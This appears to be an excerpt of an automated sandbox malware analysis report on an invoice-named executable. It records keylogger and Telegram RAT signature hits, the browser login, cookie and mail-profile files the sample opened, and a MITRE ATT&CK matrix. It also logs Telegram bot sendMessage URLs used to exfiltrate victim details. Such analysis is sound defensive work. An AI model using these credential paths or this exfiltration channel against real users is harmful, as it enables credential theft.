Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004E091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

3_2_004E091D

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_0050B340 GetUserNameW,

3_2_0050B340

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004C1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

3_2_004C1E8E

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004ADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_004ADDC0

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: juvenile.exe	Binary or memory string: WIN_81
Source: juvenile.exe	Binary or memory string: WIN_XP
Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: juvenile.exe	Binary or memory string: WIN_XPe
Source: juvenile.exe	Binary or memory string: WIN_VISTA
Source: juvenile.exe	Binary or memory string: WIN_7
Source: juvenile.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	3_2_004E8C4F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_004E923B
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00928C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	6_2_00928C4F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0092923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_0092923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	3 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	31 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	11 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FACT0987789000900.exe	71%	ReversingLabs	Win32.Exploit.Generic
FACT0987789000900.exe	80%	Virustotal		Browse
FACT0987789000900.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\thixolabile\juvenile.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\thixolabile\juvenile.exe	71%	ReversingLabs	Win32.Exploit.Generic

Source	Detection	Scanner	Label	Link
https://reallyfreegeoip.orgch8	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
